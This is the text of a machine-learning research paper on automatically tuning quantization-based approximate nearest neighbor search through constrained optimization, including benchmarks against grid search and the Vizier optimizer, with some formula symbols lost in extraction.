+ AUTOMATING NEAREST NEIGHBOR SEARCH CONFIG-
2
+ URATION WITH CONSTRAINED OPTIMIZATION
3
+ Philip Sun, Ruiqi Guo & Sanjiv Kumar
4
+ Google Research
5
+ New York, NY
6
+ {sunphil,guorq,sanjivk}@google.com
7
+ ABSTRACT
8
+ The approximate nearest neighbor (ANN) search problem is fundamental to ef-
9
+ ficiently serving many real-world machine learning applications. A number of
10
+ techniques have been developed for ANN search that are efficient, accurate, and
11
+ scalable. However, such techniques typically have a number of parameters that
12
+ affect the speed-recall tradeoff, and exhibit poor performance when such parame-
13
+ ters aren’t properly set. Tuning these parameters has traditionally been a manual
14
+ process, demanding in-depth knowledge of the underlying search algorithm. This
15
+ is becoming an increasingly unrealistic demand as ANN search grows in popu-
16
+ larity. To tackle this obstacle to ANN adoption, this work proposes a constrained
17
+ optimization-based approach to tuning quantization-based ANN algorithms. Our
18
+ technique takes just a desired search cost or recall as input, and then generates
19
+ tunings that, empirically, are very close to the speed-recall Pareto frontier and give
20
+ leading performance on standard benchmarks.
21
+ 1
22
+ INTRODUCTION
23
+ Efficient nearest neighbor search is an integral part of approaches to numerous tasks in machine
24
+ learning and information retrieval; it has been leveraged to effectively solve a number of challenges
25
+ in recommender systems (Benzi et al., 2016; Cremonesi et al., 2010), coding theory (May & Ozerov,
26
+ 2015), multimodal search (Gfeller et al., 2017; Miech et al., 2021), and language modeling (Guu et al.,
27
+ 2020; Khandelwal et al., 2020; Kitaev et al., 2020). Vector search over the dense, high-dimensional
28
+ embedding vectors generated from deep learning models has become especially important following
29
+ the rapid rise in capabilities and performance of such models. Nearest neighbor search is also
30
+ increasingly being used for assisting training tasks in machine learning (Lindgren et al., 2021; Yen
31
+ et al., 2018).
32
+ Formally, the nearest neighbor search problem is as follows: we are given an n-item dataset X ∈
33
+ Rn×d composed of d-dimensional vectors, and a function for computing the distance between two
34
+ vectors D : Rd × Rd �→ R. For a query vector q ∈ Rd, our goal is to find the indices of the k-nearest
35
+ neighbors in the dataset to q:
36
+ k-arg min
37
+ i∈{1,...,n}
38
+ D(q, Xi)
39
+ Common choices of D include D(q, x) = −⟨q, x⟩ for maximum inner product search (MIPS)
40
+ and D(q, x) = ∥q − x∥2
41
+ 2 for Euclidean distance search. A linear-time scan over X solves the
42
+ nearest neighbor search problem but doesn’t scale to the large dataset sizes often found in modern-day
43
+ applications, hence necessitating the development of approximate nearest neighbor (ANN) algorithms.
44
+ A number of approaches to the ANN problem have been successful in trading off a small search
45
+ accuracy loss, measured in result recall, for a correspondingly large increase in search speed (Aumüller
46
+ et al., 2020). However, these approaches rely on tuning a number of hyperparameters that adjust the
47
+ tradeoff between speed and recall, and poor hyperparameter choices may result in performance far
48
+ below what could be achievable with ideal hyperparameter tuning. This tuning problem becomes
49
+ especially difficult at the billions-scale, where the larger dataset size typically leads to a greater
50
+ number of hyperparameters to tune. Existing approaches to tuning an ANN index, enumerated
51
+ in Table 1, all suffer from some deficiency, such as using an excessive amount of computation
52
+ 1
53
+ arXiv:2301.01702v1 [cs.LG] 4 Jan 2023
54
+
55
+ Table 1: Our technique is the first to use minimal computational cost and human involvement to
56
+ configure an ANN index to perform very close to its speed-recall Pareto frontier.
57
+ Method
58
+ Computational
59
+ Cost of Tuning
60
+ Human
61
+ Involvement
62
+ Hyperparameter
63
+ Quality
64
+ Grid search
65
+ High
66
+ Low
67
+ High
68
+ Manual tuning
69
+ Low
70
+ High
71
+ Medium
72
+ Black-box optimizer
73
+ Medium
74
+ Low
75
+ Medium
76
+ Ours
77
+ Low
78
+ Low
79
+ High
80
+ during the tuning process, necessitating extensive human-in-the-loop expertise, or giving suboptimal
81
+ hyperparameters.
82
+ Mitigating these issues is becoming increasingly important with the growth in dataset sizes and in
83
+ the popularity of the ANN-based retrieval paradigm. This paper describes how highly performant
84
+ ANN indices may be created and tuned with minimal configuration complexity to the end user. Our
85
+ contributions are:
86
+ • Deriving theoretically-grounded models for recall and search cost for quantization-based
87
+ ANN algorithms, and presenting an efficient Lagrange multipliers-based technique for
88
+ optimizing either of these metrics with respect to the other.
89
+ • Showing that on millions-scale datasets, the tunings from our technique give almost identical
90
+ performance to optimal hyperparameter settings found through exhaustive grid search.
91
+ • Achieving superior performance on track 1 of the billions-scale big-ann-benchmarks
92
+ datasets using tunings from our technique over tunings generated by a black-box optimizer
93
+ on the same ANN index, and over all existing benchmark submissions.
94
+ Our constrained optimization approach is very general and we anticipate it can be extended to distance
95
+ measures, quantization algorithms, and search paradigms beyond those explored in this paper.
96
+ 2
97
+ RELATED WORK
98
+ 2.1
99
+ ANN ALGORITHMS
100
+ Literature surrounding the ANN problem is extensive, and many solutions have been proposed,
101
+ drawing inspiration from a number of different fields. Below we give a brief outline of three families
102
+ of approaches that have found empirical success and continued research interest, with an emphasis
103
+ on the hyperparameters necessitated by each approach. Other approaches to ANN include sampling-
104
+ based algorithms (Liu et al., 2019) and a variety of geometric data structures (Bozkaya & Ozsoyoglu,
105
+ 1997; Ram & Gray, 2012); we refer readers to Bhatia & Vandana (2010); RezaAbbasifard et al.
106
+ (2014); Wang et al. (2014; 2021) for more comprehensive surveys.
107
+ Hashing approaches
108
+ Techniques under this family utilize locality sensitive hash (LSH) functions,
109
+ which are functions that hash vectors with the property that more similar vectors are more likely to
110
+ collide in hash space (Andoni & Razenshteyn, 2015; Datar et al., 2004; Shrivastava & Li, 2014). By
111
+ hashing the query and looking up the resulting hash buckets, we may expect to find vectors close to
112
+ the query. Hashing algorithms are generally parameterized by the number and size of their hash tables.
113
+ The random memory access patterns of LSH often lead to difficulties with efficient implementation,
114
+ and the theory that prescribes hyperparameters for LSH-based search generally cannot consider
115
+ dataset-specific idiosyncrasies that allow for faster search than otherwise guaranteed for worst-case
116
+ inputs; see Appendix A.1 for further investigation.
117
+ Graph approaches
118
+ These algorithms compute a (potentially approximate) nearest neighbor graph
119
+ on X, where each element of X becomes a graph vertex and has directed edges towards its nearest
120
+ neighbors. The nearest neighbors to q are computed by starting at some vertex and traversing edges
121
+ 2
122
+
123
+ to vertices closer to q. These algorithms are parameterized by graph construction details, such as the
124
+ number of edges; any post-construction adjustments, such as improving vertex degree distribution
125
+ and graph diameter (Fu et al., 2019; Iwasaki & Miyazaki, 2018; Malkov & Yashunin, 2020); and
126
+ query-time parameters for beam search and selecting the initial set of nodes for traversal.
127
+ Quantization approaches
128
+ These algorithms create a compressed form of the dataset ˜
129
+ X; at query
130
+ time, they return the points whose quantized representations are closest to the query. Speedups are
131
+ generally proportional to the reduction in dataset size. These reductions can be several orders of
132
+ magnitude, although coarser quantizations lead to greater recall loss. Quantization techniques include
133
+ VQ, where each datapoint is assigned to the closest element in a codebook C, and a number of
134
+ multi-codebook quantization techniques, where the datapoint is approximated as some aggregate
135
+ (concatenation, addition, or otherwise) of the codebook element it was assigned to per-codebook
136
+ (Babenko & Lempitsky, 2015; Guo et al., 2020; Jégou et al., 2011). Quantization-based approaches
137
+ generally must be tuned on codebook size and the number of codebooks.
138
+ Growth in parameterization complexity with respect to dataset size
139
+ While the above ap-
140
+ proaches may only each introduce a few hyperparameters, many of the best-performing ANN
141
+ algorithms layer multiple approaches, leading to a higher-dimensional hyperparameter space much
142
+ more difficult to tune. For example, Chen et al. (2021) uses VQ, but also a graph-based approach to
143
+ search over the VQ codebook. Other algorithms (Guo et al., 2020; Johnson et al., 2021), including
144
+ what we discuss in this work, use VQ to perform a first-pass pruning over the dataset and then a
145
+ multi-codebook quantization to compute more accurate distance estimates.
146
+ 2.2
147
+ ANN HYPERPARAMETER TUNING
148
+ Tuning in low-dimensional hyperparameter spaces may be effectively handled with grid search;
149
+ however, quantization-based ANN algorithms with few hyperparameters scale poorly with dataset
150
+ size, as shown in Appendix A.8. In higher-dimensional ANN hyperparameter spaces, where grid
151
+ search is computationally intractable, there are two predominant approaches to the tuning problem,
152
+ each with their drawbacks. The first is using heuristics to reduce the search space into one tractable
153
+ with grid search, as in Criteo (2021) or Ren et al. (2020). These heuristics may perform well when set
154
+ and adjusted by someone with expertise in the underlying ANN search algorithm implementation, but
155
+ such supervision is often impractical or expensive; otherwise, these heuristics may lead to suboptimal
156
+ hyperparameter choices.
157
+ The second approach is to use black-box optimization techniques such as Bergstra et al. (2011)
158
+ or Golovin et al. (2017) to select hyperparameters in the full-dimensionality tuning space. These
159
+ algorithms, however, lack inductive biases from knowing the underlying ANN search problem and
160
+ therefore may require a high number of samples before finding hyperparameter tunings that are
161
+ near optimal. Measurement noise from variability in machine performance further compounds the
162
+ challenges these black-box optimizers face.
163
+ 3
164
+ PRELIMINARIES
165
+ 3.1
166
+ LARGE-SCALE ONLINE APPROXIMATE NEAREST NEIGHBORS
167
+ In this work we focus on the problem of tuning ANN algorithms for online search of large-scale
168
+ datasets. In this scenario, the search algorithm must respond to an infinite stream of latency-sensitive
169
+ queries arriving at roughly constant frequency. This setting is common in recommender and semantic
170
+ systems where ANN speed directly contributes to the end-user experience. We are given a sample set
171
+ of queries, representative of the overall query distribution, with which we can tune our data structure.
172
+ Large dataset size makes the linear scaling of exact brute-force search impractical, so approximate
173
+ search algorithms must be used instead. These algorithms may be evaluated along two axes:
174
+ 1. Accuracy: quantified by recall@k, where k is the desired number of neighbors. Sometimes
175
+ the c-approximation ratio, the ratio of the approximate and the true nearest-neighbor distance,
176
+ is used instead; we correlate between this metric and recall in Appendix A.1.
177
+ 2. Search cost: typically quantified by the queries per second (QPS) a given server can handle.
178
+ 3
179
+
180
+ An effective ANN solution maximizes accuracy while minimizing search cost.
181
+ 3.2
182
+ VECTOR QUANTIZATION (VQ)
183
+ The ANN algorithm we tune uses a hierarchical quantization index composed of vector quantization
184
+ (VQ) and product quantization (PQ) layers. We first give a brief review of VQ and PQ before
185
+ describing how they are composed to produce a performant ANN search index.
186
+ Vector-quantizing an input set of vectors X ∈ Rn×d, which we denote V Q(X), produces a codebook
187
+ C ∈ Rc×d and codewords w ∈ {1, 2, . . . , c}n. Each element of X is quantized to the closest
188
+ codebook element in C, and the quantization assignments are stored in w. The quantized form of the
189
+ ith element of X can therefore be computed as ˜
190
+ Xi = Cwi.
191
+ VQ may be used for ANN by computing the closest codebook elements to the query
192
+ S := k-arg min
193
+ i∈{1,2,...,c}
194
+ D(q, Ci)
195
+ and returning indices of datapoints belonging to those codebook elements, {j|wj ∈ S}. This
196
+ candidate set may also be further refined by higher-bitrate distance calculations to produce a final
197
+ result set. In this manner, VQ can be interpreted as a pruning tree whose root stores C and has c
198
+ children; the ith child contains the points {Xj|wj = i}; equivalently, this tree is an inverted index (or
199
+ inverted file index, IVF) which maps each centroid to the datapoints belonging to the centroid.
200
+ 3.3
201
+ PRODUCT QUANTIZATION (PQ)
202
+ Product quantization divides the full d-dimensional vector space into K subspaces and quantizes
203
+ each space separately. If we assume the subspaces are all equal in dimensionality, each covering
204
+ l = ⌈d/K⌉ dimensions, then PQ gives K codebooks C(1), . . . , C(K) and K codeword vectors
205
+ w(1), . . . , w(K), with C(k) ∈ Rck×l and w(k) ∈ {1, . . . , ci}n where ck is the number of centroids in
206
+ subspace k. The ith element can be recovered as the concatenation of {C(k)
207
+ w(k)
208
+ i |k ∈ {1, . . . , K}}.
209
+ For ANN search, VQ is generally performed with a large codebook whose size scales with n and
210
+ whose size is significant relative to the size of the codewords. In contrast, PQ is generally performed
211
+ with a constant, small ck that allows for fast in-register SIMD lookups for each codebook element,
212
+ and its storage cost is dominated by the codeword size.
213
+ 3.4
214
+ ANN SEARCH WITH MULTI-LEVEL QUANTIZATION
215
+ VQ and PQ both produce fixed-bitrate encodings of the original dataset. However, in a generalization
216
+ of Guo et al. (2020), we would like to allocate more bitrate to the vectors closer to the query, which
217
+ we may achieve by using multiple quantization levels and using the lower-bitrate levels to select
218
+ which portions of the higher-bitrate levels to evaluate.
219
+ To generate these multiple levels, we start with the original dataset X and vector-quantize it, resulting
220
+ in a smaller d-dimensional dataset of codewords C. We may recursively apply VQ to C for arbitrarily
221
+ many levels. X and all C are product-quantized as well. As a concrete example, Figure 6 describes
222
+ the five-quantization-level setups used in Section 5.2.
223
+ This procedure results in a set of quantizations ˜
224
+ X1, . . . , ˜
225
+ Xm of progressively higher bitrate. Algorithm
226
+ 1 performs ANN using these quantizations and a length-m vector of search hyperparameters t, which
227
+ controls how quickly the candidate set of neighbors is narrowed down while iterating through the
228
+ quantization levels. Our goal is to find t that give excellent tradeoffs between search speed and recall.
229
+ 4
230
+ METHOD
231
+ The following sections derive proxy metrics for ANN recall and search latency as a function of
232
+ the tuning t, and then describe a Lagrange multipliers-based approach to efficiently computing t to
233
+ optimize for a given speed-recall tradeoff.
234
+ 4
235
+
236
+ Algorithm 1 Quantization-Based ANN
237
+ 1: procedure QUANTIZEDSEARCH( ˜
238
+ X, t, q)
239
+ ▷ Computes the tm nearest neighbors to q
240
+ 2:
241
+ S0 ← {1, . . . , n}
242
+ 3:
243
+ for i ← 1 to m do
244
+ ▷ Iterate over quantizations in ascending bitrate order
245
+ 4:
246
+ Si ← ti-arg min
247
+ j∈Si−1
248
+ D(q, ˜X(i)
249
+ j )
250
+ ▷ Narrow candidate set to ti elements, using ˜
251
+ X (i)
252
+ 5:
253
+ end for
254
+ 6:
255
+ return Sm
256
+ 7: end procedure
257
+ 4.1
258
+ PROXY LOSS FOR ANN RECALL
259
+ For a given query set Q and hyperparameter tuning t, the recall may be computed by simply
260
+ performing approximate search over Q and computing the recall empirically. However, such an
261
+ approach has no underlying mathematical structure that permits efficient optimization over t. Below
262
+ we approximate this empirical recall in a manner amenable to our constrained optimization approach.
263
+ First fix the dataset X and all quantizations ˜
264
+ X (i). Define functions S0(q, t), . . . , Sm(q, t) to denote
265
+ the various S computed by Algorithm 1 for query q and tuning t, and let G(q) be the set of ground-
266
+ truth nearest neighbors for q. Note our recall equals |Sm(q, t) ∩ G(q)|
267
+ |G(q)|
268
+ for a given query q and tuning
269
+ t. We can decompose this into a telescoping product and multiply it among all queries in Q to derive
270
+ the following expression for geometric-mean recall:
271
+ GeometricMeanRecall(Q, t) =
272
+
273
+ q∈Q
274
+ m
275
+
276
+ i=1
277
+ � |Si(q, t) ∩ G(q)|
278
+ |Si−1(q, t) ∩ G(q)|
279
+ �1/|Q|
280
+ ,
281
+ (1)
282
+ where the telescoping decomposition takes advantage of the fact that |S0(q, t) ∩ G(q)| = |G(q)| due
283
+ to S0 containing all datapoint indices. We choose the geometric mean, despite the arithmetic mean’s
284
+ more frequent use in aggregating recall over a query set, because the geometric mean allows for the
285
+ decomposition in log-space that we perform below. Note that the arithmetic mean is bounded from
286
+ below by the geometric mean.
287
+ Maximizing Equation 1 is equivalent to minimizing its negative logarithm:
288
+ L(Q, t) = − 1
289
+ |Q|
290
+
291
+ q∈Q
292
+ m
293
+
294
+ i=1
295
+ log
296
+ |Si(q, t) ∩ G(q)|
297
+ |Si−1(q, t) ∩ G(q)|
298
+ =
299
+ m
300
+
301
+ i=1
302
+ Eq∈Q
303
+
304
+ − log
305
+ |Si(q, t) ∩ G(q)|
306
+ |Si−1(q, t) ∩ G(q)|
307
+
308
+ (2)
309
+ Now we focus on the inner quantity inside the logarithm and how to compute it efficiently. The
310
+ chief problem is that Si(q, t) has an implicit dependency on Si−1(q, t) because Si−1 is the candidate
311
+ set from which we compute quantized distances using ˜
312
+ X (i) in Algorithm 1. This results in Si(q, t)
313
+ depending on all t1, . . . , ti and not just ti itself, making it difficult to efficiently evaluate. To resolve
314
+ this, define the single-layer candidate set
315
+ S′
316
+ i(q, ti) = ti-arg min
317
+ j∈{1,...,n}
318
+ D(q, ˜
319
+ X (i)
320
+ j )
321
+ (3)
322
+ which computes the closest ti neighbors to q according to only ˜
323
+ X (i), irrespective of other quantizations
324
+ or their tuning settings. We leverage this definition by rewriting our cardinality ratio as
325
+ |Si(q, t) ∩ G(q)|
326
+ |Si−1(q, t) ∩ G(q)| =
327
+
328
+ g∈G(q) 1g∈Si(q,t)
329
+
330
+ g∈G(q) 1g∈Si−1(q,t)
331
+ (4)
332
+ 5
333
+
334
+ and making the approximation 1g∈Si(q,t) ≈ 1g∈Si−1(q,t)1g∈S′
335
+ i(q,ti). This is roughly equivalent
336
+ to assuming most near-neighbors to q are included in Si−1(q, t); see Appendix A.2 for further
337
+ discussion. If we furthermore assume zero covariance1 between 1g∈Si−1(q,t) and 1g∈S′
338
+ i(q,ti), then
339
+ we can transform the sum of products into a product of sums:
340
+
341
+ g∈G(q)
342
+ 1g∈Si−1(q,t)1g∈S′
343
+ i(q,ti) ≈
344
+
345
+
346
+ 1
347
+ |G(q)|
348
+
349
+ g∈G(q)
350
+ 1g∈Si−1(q,t)
351
+
352
+
353
+
354
+ � �
355
+ g∈G(q)
356
+ 1g∈S′
357
+ i(q,ti)
358
+
359
+ � .
360
+ Combining this result from Equations 2 and 4, our final loss function is �m
361
+ i=1 Li(Q, ti), with the
362
+ per-quantization loss Li defined as
363
+ Li(Q, ti) = Eq∈Q
364
+
365
+ − log |S′
366
+ i(q, ti) ∩ G(q)|
367
+ |G(q)|
368
+
369
+ .
370
+ (5)
371
+ See Appendix A.4 for how Li may be efficiently computed over Q for all i ∈ {1, . . . , m}, ti ∈
372
+ {1, . . . , n}, resulting in a matrix L ∈ Rm×n. This allows us to compute the loss for any tuning t by
373
+ summing m elements from L.
374
+ 4.2
375
+ PROXY METRIC FOR ANN SEARCH COST
376
+ Similar to ANN recall, search cost may be directly measured empirically, but below we present a
377
+ simple yet effective search cost proxy compatible with our Lagrange optimization method.
378
+ Let | ˜
379
+ X (i)| denote the storage footprint of ˜
380
+ X (i). At quantization level i, for i < m, selecting the top
381
+ top ti candidates necessarily implies that a ti/n proportion of ˜
382
+ X (i+1) will need to be accessed in
383
+ the next level. Meanwhile, ˜
384
+ X (1) is always fully searched because it’s encountered at the beginning
385
+ of the search process, where the algorithm has no prior on what points are closest to q. From these
386
+ observations, we can model the cost of quantization-based ANN search with a tuning t as
387
+ J(t) ≜
388
+ 1
389
+ |X| ·
390
+
391
+ | ˜
392
+ X (1)| +
393
+ m−1
394
+
395
+ i=1
396
+ ti
397
+ n · | ˜
398
+ X (i+1)|
399
+
400
+ .
401
+ (6)
402
+ J gives the ratio of memory accesses performed per-query when performing approximate search
403
+ with tuning t to the number of memory accesses performed by exact brute-force search. This gives
404
+ a good approximation to real-world search cost because memory bandwidth is the bottleneck for
405
+ quantization-based ANN in the non-batched case. We emphasize that this cost model is effective for
406
+ comparing amongst tunings for a quantization-based ANN index, which is sufficient for our purposes,
407
+ but likely lacks the power to compare performance among completely different ANN approaches, like
408
+ graph-based solutions. Differences in memory read size, memory request queue depth, amenability
409
+ to vectorization, and numerous other characteristics have a large impact on overall performance but
410
+ are not captured in this model. Our model is, however, compatible with query batching, which we
411
+ discuss further in Appendix A.3.
412
+ 4.3
413
+ CONVEXIFICATION OF THE LOSS
414
+ We take the convex hull of each per-quantization loss Li before passing it into the constrained
415
+ optimization procedure. This results in a better-behaved optimization result but is also justified from
416
+ an ANN algorithm perspective. For any quantization level i, consider some two choices of ti that
417
+ lead to loss and cost contributions of (l1, j1) and (l2, j2). Any (loss, cost) tuple on the line segment
418
+ between these two points can be achieved via a randomized algorithm that picks between our two
419
+ choices of ti with the appropriate weighting, which implies the entire convex hull is achievable.
420
+ Empirically, we find that Li is extremely close to convex already, so this is more of a theoretical
421
+ safeguard than a practical concern.
422
+ 1Note that Si ⊆ Si−1 so this is emphatically false for 1g∈Si−1(q,t) and 1g∈Si(q,t), but with 1g∈S′
423
+ i(q,ti) we
424
+ may reasonably assume little correlation with 1g∈Si−1(q,t).
425
+ 6
426
+
427
+ 4.4
428
+ CONSTRAINED OPTIMIZATION
429
+ Formally, our tuning problem of maximizing recall with a search cost limit Jmax can be phrased as
430
+ arg min
431
+ t∈[0,n]m
432
+ m
433
+
434
+ i=1
435
+ Li(ti)
436
+ s.t.
437
+ J(t) ≤ Jmax
438
+ t1 ≥ . . . ≥ tm.
439
+ The objective function is a sum of convex functions and therefore convex itself, while the constraints
440
+ are linear and strictly feasible, so strong duality holds. We can therefore utilize the Lagrangian
441
+ arg min
442
+ t∈[0,n]m
443
+ − λJ(t) +
444
+ m
445
+
446
+ i=1
447
+ Li(ti)
448
+ s.t.
449
+ t1 ≥ . . . ≥ tm.
450
+ to find exact solutions to the constrained optimization, using λ to adjust the recall-cost tradeoff. We
451
+ show in Appendix A.5 an algorithm that uses O(nm) preprocessing time to solve the minimization
452
+ for a given value of λ in O(m log n) time.
453
+ Furthermore, because the objective function is a sum of m functions, each a convex hull defined
454
+ by n points, the Pareto frontier itself will be piecewise, composed of at most nm points. It follows
455
+ then that there are at most nm relevant λ that result in different optimization results, namely those
456
+ obtained by taking the consecutive differences among each Li and dividing by | ˜
457
+ X (i+1)|/n|X|. By
458
+ performing binary search among these candidate λ, we can find the minimum-cost tuning for a given
459
+ loss target, or the minimum-loss tuning for a given cost constraint, in O(m log n log nm) time.
460
+ In practice, even for very large datasets, m < 10, so this routine runs very quickly. The constrained
461
+ optimizations used to generate the tunings in Section 5.2 ran in under one second on a Xeon W-2135;
462
+ computation of L contributed marginally to the indexing runtime, described further in Appendex A.6.
463
+ 5
464
+ EXPERIMENTS
465
+ 5.1
466
+ MILLION-SCALE BENCHMARKS AND COMPARISON TO GRID SEARCH
467
+ 0
468
+ 2000
469
+ 4000
470
+ 6000
471
+ 8000
472
+ 10000
473
+ 12000
474
+ 0.86 0.88 0.9 0.92 0.94 0.96 0.98
475
+ 1
476
+ Speed (Queries per Second)
477
+ Accuracy (Recall@10)
478
+ ScaNN + Optimal
479
+ (Grid-Searched) Tunings
480
+ ScaNN + Ours
481
+ Figure 1: Our technique’s tunings compared
482
+ to grid-searched tunings, applied to ScaNN
483
+ on Glove1M.
484
+ To see how closely our algorithm’s resulting hyperpa-
485
+ rameter settings approach the true optimum, we com-
486
+ pare its output to tunings found through grid search.
487
+ We compare against the grid-searched parameters
488
+ used by ScaNN (Guo et al., 2020) in its leading per-
489
+ formance on the public Glove1M benchmark from
490
+ Aumüller et al. (2020). As shown in Figure 1 be-
491
+ low, our method’s tunings are almost exactly on the
492
+ speed-recall frontier.
493
+ While the resulting tunings are of roughly equivalent
494
+ quality, grid search takes far longer to identify such
495
+ tunings; it searched 210 configurations in 22 minutes.
496
+ In comparison, on the same machine, our method
497
+ took 53 seconds to compute L and run the constrained
498
+ optimization to generate tunings.
499
+ 5.2
500
+ BILLION-SCALE BENCHMARKS
501
+ We now proceed to larger-scale datasets, where the tuning space grows significantly; the following
502
+ benchmarks use a five-level quantization index (see Appendix A.6.1 for more details), resulting
503
+ 7
504
+
505
+ 0
506
+ 10000
507
+ 20000
508
+ 30000
509
+ 40000
510
+ 50000
511
+ 60000
512
+ 70000
513
+ 80000
514
+ 90000
515
+ 100000
516
+ 0.5
517
+ 0.55
518
+ 0.6
519
+ 0.65
520
+ 0.7
521
+ 0.75
522
+ 0.8
523
+ Speed (Queries per Second)
524
+ Accuracy (Recall@10)
525
+ FAISS
526
+ KST
527
+ Puck
528
+ Team 11
529
+ Ours
530
+ (a) DEEP1B
531
+ 0
532
+ 10000
533
+ 20000
534
+ 30000
535
+ 40000
536
+ 50000
537
+ 60000
538
+ 70000
539
+ 80000
540
+ 0.6
541
+ 0.65
542
+ 0.7
543
+ 0.75
544
+ 0.8
545
+ 0.85
546
+ Speed (Queries per Second)
547
+ Accuracy (Recall@10)
548
+ FAISS
549
+ KST
550
+ Puck
551
+ Team 11
552
+ Ours
553
+ (b) Microsoft Turing-ANNS
554
+ 0
555
+ 10000
556
+ 20000
557
+ 30000
558
+ 40000
559
+ 50000
560
+ 60000
561
+ 70000
562
+ 80000
563
+ 0.05
564
+ 0.1
565
+ 0.15
566
+ 0.2
567
+ 0.25
568
+ 0.3
569
+ 0.35
570
+ 0.4
571
+ Speed (Queries per Second)
572
+ Accuracy (Recall@10)
573
+ FAISS
574
+ Puck
575
+ Ours
576
+ (c) Yandex Text-to-Image
577
+ Figure 2: Speed-recall tradeoffs of our tuning algorithm plus ANN search implementation, compared
578
+ to others from track 1 of the standardized https://big-ann-benchmarks.com datasets.
579
+ in a four-dimensional hyperparameter space. Even with very optimistic assumptions, this gives
580
+ hundreds of thousands of tunings to grid search over, which is computationally intractable, so we
581
+ compare to heuristic, hand-tuned, and black-box optimizer settings instead. Here we use our own
582
+ implementation of a multi-level quantization ANN index, and benchmark on three datasets from
583
+ big-ann-benchmarks.com (Simhadri et al., 2022), following the experimental setup stipulated
584
+ by track 1 of the competition; see Appendix A.6 for more details. Our results are shown in Figure 2.
585
+ We find that even in this much more complex hyperparameter space, our technique manages to find
586
+ settings that make excellent speed-recall tradeoffs, resulting in leading performance on these datasets.
587
+ 5.2.1
588
+ COMPARISON AGAINST BLACK-BOX OPTIMIZERS
589
+ 0
590
+ 10000
591
+ 20000
592
+ 30000
593
+ 40000
594
+ 50000
595
+ 60000
596
+ 70000
597
+ 80000
598
+ 90000
599
+ 100000
600
+ 0.5
601
+ 0.55
602
+ 0.6
603
+ 0.65
604
+ 0.7
605
+ 0.75
606
+ 0.8
607
+ Speed (Queries per Second)
608
+ Accuracy (Recall@10)
609
+ Vizier Trials
610
+ Ours
611
+ Figure 3: On DEEP1B, our hyperparameter
612
+ tunings achieve significantly better speed-
613
+ recall tradeoffs than those found by Vizier.
614
+ To see if black-box optimizers can effectively tune
615
+ quantization-based ANN indices, we used Vizier
616
+ (Golovin et al., 2017) to tune the same DEEP1B in-
617
+ dex used above. Our Vizier setup involved an in-the-
618
+ loop ANN index serving online requests, with Vizier
619
+ generating candidate configurations, measuring their
620
+ resulting recall and throughput, and then using those
621
+ measurements to inform further candidate selections.
622
+ We ran the Vizier study for 6 hours, during which it con-
623
+ ducted over 1800 trials; their recall and performance
624
+ measurements are plotted to the right in Figure 3.
625
+ We can see that Vizier found several effective tunings
626
+ close to the Pareto frontier of our technique, but then
627
+ failed to interpolate or extrapolate from those tunings.
628
+ Our technique not only generated better tunings, but
629
+ did so using less compute; notably, the computation of
630
+ statistics Li and the constrained optimization procedure
631
+ were done with low-priority, preemptible, batch com-
632
+ pute resources, while in contrast Vizier requires instances of online services in a carefully controlled
633
+ environment in order to get realistic and low-variance throughput measurements.
634
+ 5.3
635
+ RECALL AND COST MODEL ACCURACY
636
+ We desire linear, predictable relationships between the modeled and the corresponding real-world
637
+ values for both recall and search cost. This is important both so that the optimization can produce
638
+ tunings that are effective in practice, and so that users can easily interpret and apply the results.
639
+ In Figure 4, we take the DEEP1B hyperparameter tunings used above in Section 5.2 and plot their
640
+ respective modeled recalls against empirical recall@10, and modeled search costs against measured
641
+ reciprocal throughput. Recall was modeled as exp(− � Li) while J was simply used for cost.
642
+ We can conclude from the square of their sample Pearson correlation coefficients (r2) that both
643
+ relationships between analytical values and their empirical measurements are highly linear.
644
+ 8
645
+
646
+ 0.2
647
+ 0.3
648
+ 0.4
649
+ 0.5
650
+ 0.5
651
+ 0.6
652
+ 0.7
653
+ 0.8
654
+ r2 = 99.7%
655
+ Modeled Recall
656
+ Empirical Recall@10
657
+ 0.2
658
+ 0.4
659
+ 0.6
660
+ 0.8
661
+ 0.1
662
+ 0.2
663
+ 0.3
664
+ r2 = 99.8%
665
+ Modeled Cost
666
+ 1 / Throughput (ms/query)
667
+ Figure 4: Modeled costs and recalls have a highly linear relationship with their true values.
668
+ 5.4
669
+ OUT-OF-SAMPLE QUERY PERFORMANCE
670
+ Our hyperparameter tunings were optimized based
671
+ on statistics calculated on a query sample Q, but
672
+ in order to fulfill their purpose, these tunings must
673
+ generalize and provide good performance and re-
674
+ call on the overall query stream. We test gener-
675
+ alization capability by randomly splitting the 104
676
+ queries in the DEEP1B dataset into two equal-sized
677
+ halves Q1 and Q2. Then we compare the result-
678
+ ing Pareto frontiers of training on Q1 and testing
679
+ on Q2 (out-of-sample), versus training and testing
680
+ both on Q2 (in-sample). The resulting Pareto fron-
681
+ tiers, shown in Figure 5, are near-indistinguishable
682
+ and within the range of measurement error from
683
+ machine performance fluctuations, indicating excel-
684
+ lent generalization. Qualitatively, the in-sample and
685
+ out-of-sample tuning parameters differ only very
686
+ slightly, suggesting our optimization is robust.
687
+ 0.55
688
+ 0.60
689
+ 0.65
690
+ 0.70
691
+ 0.75
692
+ 0.80
693
+ Recall@10
694
+ 5000
695
+ 10000
696
+ 15000
697
+ 20000
698
+ 25000
699
+ 30000
700
+ Queries per Second
701
+ In-Sample
702
+ Out-of-Sample
703
+ Figure 5: Speed-recall frontiers for tunings
704
+ derived from in-sample and out-of-sample
705
+ query sets on the DEEP1B dataset.
706
+ 5.5
707
+ ADDITIONAL EXPERIMENTS
708
+ In Appendix A.7 we analyze the effects of query sample size and find even a small (1000) query
709
+ sample is sufficient to provide effective tuning results. Appendix A.8 shows that grid-searching
710
+ a shallow quantization index (similar to what was done in Section 5.1) fails to perform well on
711
+ billion-scale datasets.
712
+ 6
713
+ CONCLUSION
714
+ As adoption of nearest neighbor search increases, so does the importance of providing ANN frame-
715
+ works capable of providing good performance even to non-experts unfamiliar with the inner details
716
+ of ANN algorithms. We believe our work makes a significant step towards this goal by providing
717
+ a theoretically grounded, computationally efficient, and empirically successful method for tuning
718
+ quantization-based ANN algorithms. However, our tuning model still relies on the user to pick the
719
+ VQ codebook size, because VQ indexing is a prerequisite needed to compute the statistics with which
720
+ we generates tunings from. A model for how VQ codebook size impacts these statistics would allow
721
+ for a completely hands-off, efficient, ANN solution. Additional work could refine the search cost
722
+ model to more accurately reflect caches, account for network costs in distributed ANN solutions,
723
+ and support alternative storage technologies such as flash. In general, we are also optimistic that the
724
+ strategy of computing offline statistics from a query sample to model online ANN search behavior
725
+ may generalize to non-quantization-based ANN algorithms as well.
726
+ 9
727
+
728
+ ACKNOWLEDGMENTS
729
